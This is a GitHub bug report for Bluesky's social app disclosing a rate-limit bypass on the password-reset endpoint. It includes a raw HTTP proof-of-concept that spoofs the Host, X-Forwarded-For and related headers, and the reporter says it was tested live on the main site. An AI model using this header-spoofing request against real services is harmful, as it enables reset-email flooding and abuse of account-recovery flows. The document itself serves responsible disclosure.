social-app
social-app copied to clipboard
bluesky-social
Rate Limit Bypassed For Forget Password & Others
Steps to Reproduce
-
Sending request for forget password has a rate limit of 15 attempts but this can be bypassed
-
Forget password and intercept request in Burpsuite or whatever you use. send request in repeater now send 15 times request you will see that HTTP header Ratelimit-Remaining is consuming but changing probably this Host: bsky.app to any other url can bypass that limitation.
POC - Sending request like this can easily bypass such limits .
POST /xrpc/com.atproto.server.requestPasswordReset HTTP/2
Host: aaabing.com
X-Forwarded-For: aaaabing.com
X-Forwarded-Host: aaaabing.com
X-Client-Ip: aaaalocalhost
User-Agent: aaaaaaaa
Content-Type: application/json
Content-Length: 35
{"email":"[email protected]"}
This is real live POC tested on main site
I send 23 requests in 13 seconds and I got all mails , as I have described above. ^
Thanks!
Attachments
What platform(s) does this occur on?
iOS, Android, Web (Desktop), Web (Mobile)
Device Info
No response
What version of the app are you using?
latest
Additional Information
I like finding security issues in system so yeah. Looking forward to hear from you. Don't forget to give hall of fame or credit to me , name - Chirag Artani , URL - Chirag Artani
